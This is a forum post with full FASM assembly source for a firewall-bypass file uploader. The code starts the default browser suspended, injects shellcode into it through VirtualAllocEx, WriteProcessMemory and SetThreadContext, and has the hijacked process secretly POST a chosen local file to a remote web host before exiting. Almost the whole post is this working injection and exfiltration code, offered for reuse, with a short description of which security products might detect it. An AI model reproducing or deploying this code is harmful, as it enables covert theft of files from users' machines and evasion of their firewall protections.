http://www.rohitab.com/discuss/topic/31151-fasmcc-fuplo-file-uploading-and-simple-firewall-bypass/
Hello.
I wrote this for a friend who reads this forum. The code isn't very clear (not commented, because I wrote it very fast — in one night, ~10h). The only exception is utils.inc, which I ripped from another project of mine. Anyway, I decided to show off this code because you will probably find it useful. The actual code is written in FASM and compiles to an .obj file. An object file is similar to a .DLL, but it is in linkable format, so you can use it from HLLs. The source code and a simple example of how to use it from C++ are below (the compiled .obj and a Dev-C++ project file are in the attachment).
The method I use for firewall bypass is simple and effective (not the script-kiddie registry-modification trick...). The fuplo(char* szUrl, char* szFile) function in fuplo.obj first resolves the default browser from the registry (HKEY_CLASSES_ROOT\HTTP\shell\open\command) and starts it with CreateProcess and the CREATE_SUSPENDED flag. Then, using VirtualAllocEx and WriteProcessMemory, it copies the upload code (plus the URL and file name) into the browser's address space, points the suspended main thread at that copy with SetThreadContext and resumes it. The browser process executes the code, uploads the specified file and calls ExitProcess — so the browser never actually runs its own code or shows a window -> hooray!
So the method relies on the firewall having already granted the browser (whatever the registry value points at) permission to access the Internet, i.e. on per-application outbound rules. I still want to say that this method is not completely stealthy: firewall software can hook CreateProcess and WriteProcessMemory and warn the user about suspicious behaviour, and the exact sequence this code performs — CreateProcess with CREATE_SUSPENDED, VirtualAllocEx of a PAGE_EXECUTE_READWRITE buffer, WriteProcessMemory, SetThreadContext, ResumeThread — is a well-known injection pattern that host-based security products look for. Note also that the upload itself is plain HTTP to port 80 (the port is hard-coded, there is no TLS), so the file name and contents are visible to anyone inspecting the traffic.
fuplo.ASM (sorry about the ugly indentation — I used a bad IDE)
format MS COFF;PE GUI 4.0
include 'win32a.inc'
include 'api/wsock32.inc'
include 'defs.inc'
public fuplo as '_fuplo'
section '.text' code readable executable
..inject:
; Entry point of the code that fuplo copies into the browser: everything from
; ..inject up to ..endofinject, followed by the NUL-terminated url and file
; name that fuplo appends right after ..endofinject. The hijacked primary
; thread starts here (its Eip is set to the remote copy of this label), with
; no arguments, so both strings are located relative to this code.
call @f                               ; push the address of @@ (= ..inject + 5, the size of this call)
@@:
; Disabled debugging stub below: presumably an endless Sleep(1000) loop that
; was used to keep the hijacked process alive while attaching a debugger.
; pushz 'kernel32.dll'
; call LocateModule;
; pushz 'Sleep'
; push eax
; call GetProc
; mov ebx, eax
;@@: push 1000
; call ebx
; jmp @b
pushz 'kernel32.dll'
call LocateModule                     ; assumed to consume its argument, so the @@ address is still on top
mov ebx, eax ; base of kernel in ebx   - upload expects kernel32's base in ebx
pop eax                               ; eax = remote address of @@
add eax, ..endofinject-..inject-5     ; eax = remote ..endofinject = start of the appended url
push eax                              ; szUrl argument for upload
mov edi, eax
mov al, 0
or ecx, -1
repnz scasb                           ; skip past the url's NUL ...
push edi                              ; ... which is where the file name starts: szFile argument
call upload                           ; upload(szFile, szUrl); returns after the POST (or any failure)
pushz 'ExitProcess'
push ebx
call GetProc
push 0
call eax                              ; ExitProcess(0): the browser never runs its own entry point
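proc upload szFile:DWORD, szUrl:DWORD
; upload(szFile, szUrl) - runs inside the hijacked browser process.
; Expects: ebx = kernel32 base (set by the ..inject stub); szUrl of the form
;          [http://][www.]host/path - the '/' is required, host <= 60 and path
;          <= 255 characters; szFile = path of the file to send.
; Does:    HTTP/1.1 POST of the file as a multipart/form-data field "upf" to
;          host:80 (port fixed, plain HTTP, no TLS). All imports are resolved
;          with GetProc at run time and the request template is addressed via
;          a call/pop trick, so the code is position-independent.
; Returns: always the eax saved before pushad, i.e. 0; failures of any step
;          just clean up what was acquired so far and return.
; Registers: ebx = ws2_32 base once loaded (kernel32 moves to hKernel32),
;          esi/edi = string / buffer cursors, everything restored by popad.
local hKernel32:DWORD
local hUser32:DWORD
local szHost:DWORD
local szPath:DWORD
local dwFileNameLen:DWORD
local szShortName:DWORD
local dwRequestLen:DWORD
local lpRequest:DWORD
local hFile:DWORD
local dwRead:DWORD
local dwFileSize:DWORD
local lpLocalAlloc:DWORD
local wsa:WSADATA
local dest:sockaddr_in
local fdSock:DWORD
xor eax, eax
pushad
mov [fdSock], -1                      ; INVALID_SOCKET, so the closesocket at .Exit3 is harmless before socket()
; --- modules: user32 for wsprintfA, ws2_32 for the socket calls ---
pushz 'user32.dll'
pushz 'LoadLibraryA'
push ebx
call GetProc
mov esi, eax                          ; esi = LoadLibraryA
call eax
test eax, eax
je .Exit
mov [hUser32], eax
pushz 'WS2_32.dll'
call esi
test eax, eax
je .Exit
mov [hKernel32], ebx
mov ebx, eax                          ; ebx = ws2_32 base from here on
lea eax, [wsa]
push eax
push 101h                             ; WinSock 1.1
pushz 'WSAStartup'
push ebx
call GetProc
call eax
test eax, eax
jnz .Exit
; --- split szUrl into szHost and szPath (LocalAlloc'ed copies) ---
mov [dwRequestLen], 0
mov edi, [szUrl]
cmp dword [edi], 'http'
jnz .wwwcheck
add edi, 7                            ; skip "http://"
.wwwcheck: cmp dword [edi], 'www.'
jnz @f
add edi, 4                            ; "www." is dropped from the Host header
@@: mov esi, edi
mov al, '/'
mov ecx, 60                           ; host name limited to 60 characters
repnz scasb
jnz .Exit2                            ; no '/' within the limit: invalid url
sub edi, esi                          ; edi = host length + 1 (the '/')
add [dwRequestLen], edi
dec [dwRequestLen]
push edi
push edi
push LMEM_FIXED
pushz 'LocalAlloc'
push [hKernel32]
call GetProc
mov [lpLocalAlloc], eax
call eax
pop ecx                               ; ecx = host length + 1
test eax, eax
je .Exit2
mov edi, eax
mov [szHost], eax
push eax                              ; argument for gethostbyname below
rep movsb
mov byte [edi-1], 0                   ; the copied '/' becomes the terminator
dec esi                               ; esi back on the '/', i.e. the start of the path
mov edi, esi
mov al, 0
mov ecx, 0FFh                         ; path limited to 255 characters
repnz scasb
jnz .Exit2
sub edi, esi                          ; edi = path length + 1 (the NUL)
add [dwRequestLen], edi
dec [dwRequestLen]
push edi
push edi
push LMEM_FIXED
call [lpLocalAlloc]
pop ecx
test eax, eax
je .Exit2
mov edi, eax
mov [szPath], eax
rep movsb                             ; copies the NUL as well
pushz 'gethostbyname'
push ebx
call GetProc
call eax                              ; gethostbyname(szHost), argument pushed above
test eax, eax
je .Exit2
mov eax, [eax+hostent.h_addr_list]
mov eax, [eax]
mov eax, [eax]                        ; first IPv4 address, already in network byte order
mov [dest+sockaddr_in.sin_addr], eax
; --- open the file and learn its size ---
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ
push [szFile]
pushz 'CreateFileA'
push [hKernel32]
call GetProc
call eax
cmp eax, -1                           ; CreateFile reports failure as INVALID_HANDLE_VALUE, not 0
je .Exit2
mov [hFile], eax
push NULL
push eax
pushz 'GetFileSize'
push [hKernel32]
call GetProc
call eax
cmp eax, -1                           ; INVALID_FILE_SIZE; only the low dword is used (files < 4 GB)
je .CloseAndExit
mov [dwFileSize], eax
add [dwRequestLen], eax
; --- file name component of szFile: everything after the last '\' ---
mov edi, [szFile]
xor al, al
or ecx, -1
repnz scasb                           ; edi = one past the terminating NUL
lea esi, [edi-2]                      ; esi = last character (szFile-1 for an empty string)
cmp esi, [szFile]
jae .FindSep
mov esi, [szFile]                     ; empty string: empty name, never read in front of the buffer
jmp .ShortFN
.FindSep:
cmp byte [esi], '\'
je .AfterSep
cmp esi, [szFile]
je .ShortFN                           ; reached the first character without a separator: use it whole
dec esi
jmp .FindSep
.AfterSep:
inc esi                               ; first character after the separator
.ShortFN:
mov [szShortName], esi
sub edi, esi
dec edi                               ; edi = strlen(short name)
mov [dwFileNameLen], edi
; --- request buffer ---
; Size estimate: host + path + file size (added above) + the whole template
; (no placeholder bytes subtracted) + file name + up to 10 digits for %ld and
; wsprintf's terminator. This covers everything wsprintfA, ReadFile and the
; closing-boundary copy write, without relying on page rounding.
add [dwRequestLen], .FormatEnd-.FormatStart
add [dwRequestLen], 11
mov eax, [dwFileNameLen]
add [dwRequestLen], eax
push PAGE_READWRITE
push MEM_COMMIT
push [dwRequestLen]
push NULL
pushz 'VirtualAlloc'
push [hKernel32]
call GetProc
call eax
test eax, eax
je .CloseAndExit
mov [lpRequest], eax
push MEM_RELEASE                      ; dwFreeType and dwSize for the VirtualFree at .Exit3, pushed now
push 0                                ; so that every jump to .Exit3 finds them in place
; --- headers and part header, formatted straight into the buffer ---
push [szShortName]
push [dwFileSize]
add dword [esp], .FormatEnd-.ContentStart-3   ; part header + closing boundary, minus "%s" and the NUL
mov eax, [dwFileNameLen]
add [esp], eax                        ; Content-Length = part header + file name + file + closing boundary
push [szHost]
push [szPath]
call .FormatEnd                       ; pushes the address of .FormatStart as the format argument
.FormatStart: db "POST %s HTTP/1.1",0Dh,0Ah
db "Host: %s",0Dh,0Ah
db "User-Agent: fuplo",0Dh,0Ah
db 'Content-Type: multipart/form-data; boundary="=_vw0.98992842109405d_="',0Dh,0Ah
db "Content-Length: %ld",0Dh,0Ah,0Dh,0Ah
.ContentStart db "--=_vw0.98992842109405d_=",0Dh,0Ah
db 'Content-Disposition: form-data; name="upf"; filename="%s"',0Dh,0Ah,0Dh,0Ah,0
.EndBoundary: db 0Dh,0Ah,"--=_vw0.98992842109405d_=--",0Dh,0Ah
.FormatEnd: push [lpRequest]
pushz 'wsprintfA'
push [hUser32]
call GetProc
call eax                              ; wsprintfA(lpRequest, fmt, szPath, szHost, contentLength, szShortName)
add esp, 4 * 6                        ; cdecl: drop the five arguments and the format address
mov edi, [lpRequest]
add edi, eax                          ; edi = where the file body goes (wsprintf's NUL is overwritten)
add eax, .FormatEnd-.EndBoundary
mov [dwRequestLen], eax               ; header bytes + closing boundary; the file is added after ReadFile
push [szHost]
pushz 'LocalFree'
push [hKernel32]
call GetProc
mov esi, eax
call eax
push [szPath]
call esi
; --- file body ---
push NULL
lea eax, [dwRead]
push eax
push [dwFileSize]
push edi
push [hFile]
pushz 'ReadFile'
push [hKernel32]
call GetProc
call eax
mov esi, eax                          ; keep ReadFile's result across CloseHandle
push [hFile]
pushz 'CloseHandle'
push [hKernel32]
call GetProc
call eax
test esi, esi
je .Exit3
mov eax, [dwRead]
cmp eax, [dwFileSize]
jne .Exit3                            ; short read: Content-Length would not match, give up
add [dwRequestLen], eax
add edi, eax                          ; edi = end of the file data
call @f
@@: pop esi
add esi, .EndBoundary - @b            ; esi = closing boundary (position-independent)
mov ecx, .FormatEnd-.EndBoundary
rep movsb
; --- connect to host:80 and send the whole request ---
push 0
push SOCK_STREAM
push PF_INET
pushz 'socket'
push ebx
call GetProc
call eax
cmp eax, -1                           ; INVALID_SOCKET
je .Exit3
mov [fdSock], eax
mov [dest+sockaddr_in.sin_family], AF_INET
mov [dest+sockaddr_in.sin_port], 5000h    ; htons(80): the port is fixed, no ":port" in the url is honoured
mov ecx, sizeof.sockaddr_in.sin_zero
lea edi, [dest+sockaddr_in.sin_zero]
xor al, al
rep stosb
push sizeof.sockaddr_in
lea eax, [dest]
push eax
push [fdSock]
pushz 'connect'
push ebx
call GetProc
call eax
cmp eax, -1                           ; SOCKET_ERROR
je .Exit3
pushz 'send'
push ebx
call GetProc
mov esi, eax                          ; esi = send
mov edi, [lpRequest]
@@: push 0
push [dwRequestLen]
push edi
push [fdSock]
call esi
cmp eax, -1                           ; SOCKET_ERROR: stop instead of adding -1 to the cursor and looping
je .Exit3
add edi, eax
sub [dwRequestLen], eax
jnz @b                                ; partial send: continue with the rest
.Exit3: push [lpRequest]              ; VirtualFree(lpRequest, 0, MEM_RELEASE); dwSize/dwFreeType
pushz 'VirtualFree'                   ; were pushed right after VirtualAlloc
push [hKernel32]
call GetProc
call eax
push [fdSock]
pushz 'closesocket'
push ebx
call GetProc
call eax
.Exit2: pushz 'WSACleanup'
push ebx
call GetProc
call eax
.Exit: popad
ret
.CloseAndExit:
; Failure between CreateFileA and the request buffer: release the file handle
; and leave through the normal WSACleanup path.
push [hFile]
pushz 'CloseHandle'
push [hKernel32]
call GetProc
call eax
jmp .Exit2
endp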
include 'utils.inc'                   ; LocateModule / GetProc / pushz (presumably) - must sit inside the copied span
label szGivenUrl BYTE                 ; fuplo appends szUrl here, then szFile, both with their NUL
..endofinject:                        ; end of the image copied into the browser (..inject .. ..endofinject)
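proc fuplo szUrl:DWORD, szFile:DWORD
; fuplo(szUrl, szFile), exported as _fuplo - the injector side, runs in the
; caller's process. Reads the default HTTP handler from
; HKCR\HTTP\shell\open\command, starts it CREATE_SUSPENDED, copies the
; ..inject..endofinject image plus both strings into it, points the primary
; thread's Eip at the copy and resumes it.
; Returns 1 once ResumeThread succeeded, 0 on any failure. After a failure
; the suspended child (if any) is terminated so it does not linger.
; The frame and return are whatever the FASM proc macro emits (stdcall in the
; standard proc32 macros) - the C++ declaration has to match.
; Register use: ebx = hAdvapi32 while the registry is read, hKernel32 after;
; esi = registry data cursor / WriteProcessMemory; edi = remote write cursor.
xor eax, eax                          ; return value 0 until the hijack is complete (restored by popad)
pushad
local hKernel32:DWORD
local hAdvapi32:DWORD
local szBrowserPath:DWORD
local dwUrlLen:DWORD
local dwFilenameLen:DWORD
; Both lengths include the terminating NUL: the copies made below keep it so
; the injected stub can find szFile by scanning past the end of szUrl.
mov edi, [szUrl]
or ecx, -1
xor al, al
repnz scasb
neg ecx
sub ecx, 1                            ; ecx = strlen(szUrl) + 1
mov [dwUrlLen], ecx
mov edi, [szFile]
or ecx, -1
xor al, al
repnz scasb
neg ecx
sub ecx, 1                            ; ecx = strlen(szFile) + 1
mov [dwFilenameLen], ecx
pushz 'kernel32.dll'
call LocateModule
mov [hKernel32], eax
pushz 'advapi32.dll'
pushz 'LoadLibraryA'
push eax
call GetProc
call eax
test eax, eax
je _Exit                              ; no advapi32: the registry cannot be read
mov [hAdvapi32], eax
_ResolveBrowser:
local hHttpKey:DWORD
local lpKeyData:DWORD
local dwCrap:DWORD
mov ebx, eax                          ; ebx = hAdvapi32 for this section
pushz 'RegOpenKeyExA'
push eax
call GetProc
lea edx, [hHttpKey]
push edx
push KEY_QUERY_VALUE
push 0
pushz 'HTTP\shell\open\command'
push HKEY_CLASSES_ROOT
call eax
test eax, eax
jnz _Exit
; First query (lpData = NULL) only reports the size of the default value.
lea edx, [dwCrap]
push edx
push NULL
push NULL
push NULL
push NULL
push [hHttpKey]
pushz 'RegQueryValueExA'
push ebx
call GetProc
mov edi, eax                          ; edi = RegQueryValueExA
call eax
test eax, eax
jnz _CloseKeyExit
; One byte more than the value so it is NUL-terminated even if the registry
; data is not (REG_SZ data is not guaranteed to carry a terminator).
mov eax, [dwCrap]
inc eax
push eax
push LMEM_FIXED
pushz 'LocalAlloc'
push [hKernel32]
call GetProc
call eax
test eax, eax
je _CloseKeyExit
mov [lpKeyData], eax
mov esi, eax                          ; esi = value data
lea edx, [dwCrap]
push edx
push eax
push 0
push NULL
push NULL
push [hHttpKey]
call edi                              ; RegQueryValueExA(hKey, NULL, NULL, NULL, data, &size)
push eax                              ; keep the query status across RegCloseKey
push [hHttpKey]
pushz 'RegCloseKey'
push ebx
call GetProc
call eax
pop eax
test eax, eax
jnz _ExitFree
mov eax, [dwCrap]
mov byte [esi+eax], 0                 ; forced terminator in the spare byte
mov ebx, [hKernel32]                  ; ebx = hKernel32 from here on
_ParseKeyData:
; The value looks like "C:\path\browser.exe" -args or C:\path\browser.exe -args.
; Keep only the executable: up to the closing quote, or up to the first space
; when unquoted (an unquoted path that itself contains spaces is therefore
; cut short and CreateProcess fails). The scan is bounded by the value size
; instead of running off the end of the buffer when neither character exists.
mov [szBrowserPath], esi
mov ecx, [dwCrap]
test ecx, ecx
jz _ExitFree                          ; empty value: nothing to launch
lodsb
dec ecx
cmp al, '"'
jnz @f
inc [szBrowserPath]                   ; quoted: the path starts after the opening quote
jmp .SearchEnd
@@: mov al, ' '
.SearchEnd: mov edi, esi
test ecx, ecx
jz .Terminated
repnz scasb
jnz .Terminated                       ; no quote/space inside the value: use it whole
mov byte [edi-1], 0                   ; cut at the closing quote / first space
.Terminated:
_CreateProcess:
local pi:PROCESS_INFORMATION
local si:STARTUPINFO
mov ecx, sizeof.PROCESS_INFORMATION
lea edi, [pi]
push edi                              ; lpProcessInformation for CreateProcessA
xor al, al
rep stosb
mov ecx, sizeof.STARTUPINFO
lea edi, [si]
push edi                              ; lpStartupInfo for CreateProcessA
push edi                              ; argument for GetStartupInfoA
rep stosb
pushz 'GetStartupInfoA'
push ebx
call GetProc
call eax
push NULL                             ; lpCurrentDirectory
push NULL                             ; lpEnvironment
push CREATE_SUSPENDED                 ; primary thread parked before it runs anything of the browser
push FALSE                            ; bInheritHandles
push NULL                             ; lpThreadAttributes
push NULL                             ; lpProcessAttributes
push NULL                             ; lpCommandLine
push [szBrowserPath]                  ; lpApplicationName
pushz 'CreateProcessA'
push ebx
call GetProc
call eax
test eax, eax
je _ExitFree
.HijackProcess:
local lpInjection:DWORD
local ctx:CONTEXT
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
mov eax, ..endofinject-..inject
add eax, [dwUrlLen]
add eax, [dwFilenameLen]
push eax                              ; stub + both NUL-terminated strings
push NULL
push dword [pi+PROCESS_INFORMATION.hProcess]
pushz 'VirtualAllocEx'
push ebx
call GetProc
call eax
test eax, eax
je _KillChild                         ; nothing to write into: do not leave a suspended browser behind
mov [lpInjection], eax
lea edx, [ctx]
push edx
mov [edx+CONTEXT.ContextFlags], CONTEXT_FULL
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'GetThreadContext'
push ebx
call GetProc
call eax
test eax, eax
je _KillChild                         ; without a valid context Eip would be set into garbage
mov edi, [lpInjection]                ; edi = remote write cursor
lea eax, [dwCrap]
push eax
push ..endofinject-..inject
push ..inject
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
pushz 'WriteProcessMemory'
push ebx
call GetProc
mov esi, eax                          ; esi = WriteProcessMemory
mov [ctx+CONTEXT.Eip], edi            ; the primary thread will start in the copied ..inject stub
call eax
test eax, eax
je _KillChild
add edi, ..endofinject-..inject       ; = remote ..endofinject, where the stub expects the url
lea eax, [dwCrap]
push eax
push [dwUrlLen]
push [szUrl]
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
call esi
test eax, eax
je _KillChild
add edi, [dwUrlLen]                   ; file name directly after the url's NUL
lea eax, [dwCrap]
push eax
push [dwFilenameLen]
push [szFile]
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
call esi
test eax, eax
je _KillChild
lea edx, [ctx]
push edx
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'SetThreadContext'
push ebx
call GetProc
call eax
test eax, eax
je _KillChild
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'ResumeThread'
push ebx
call GetProc
call eax
cmp eax, -1                           ; ResumeThread reports failure as -1
je _KillChild
mov [esp+_PUSHAD.Pushad_eax], 1       ; success: popad at _Exit returns 1
_CloseChild:
; Our handles on the child are not needed any more (on success it keeps
; running on its own; on failure it has just been terminated).
pushz 'CloseHandle'
push ebx
call GetProc
mov esi, eax
push dword [pi+PROCESS_INFORMATION.hThread]
call esi
push dword [pi+PROCESS_INFORMATION.hProcess]
call esi
jmp _ExitFree
_KillChild:
; Failure after CreateProcessA: the suspended child would otherwise stay
; around forever, possibly with a half-written injection buffer.
push 1
push dword [pi+PROCESS_INFORMATION.hProcess]
pushz 'TerminateProcess'
push ebx
call GetProc
call eax
jmp _CloseChild
_CloseKeyExit:
; Registry read failed after RegOpenKeyExA succeeded: close the key, return 0.
push [hHttpKey]
pushz 'RegCloseKey'
push [hAdvapi32]
call GetProc
call eax
jmp _Exit
_ExitFree:
push [lpKeyData]
pushz 'LocalFree'
push [hKernel32]
call GetProc
call eax
_Exit: popad
ret
endp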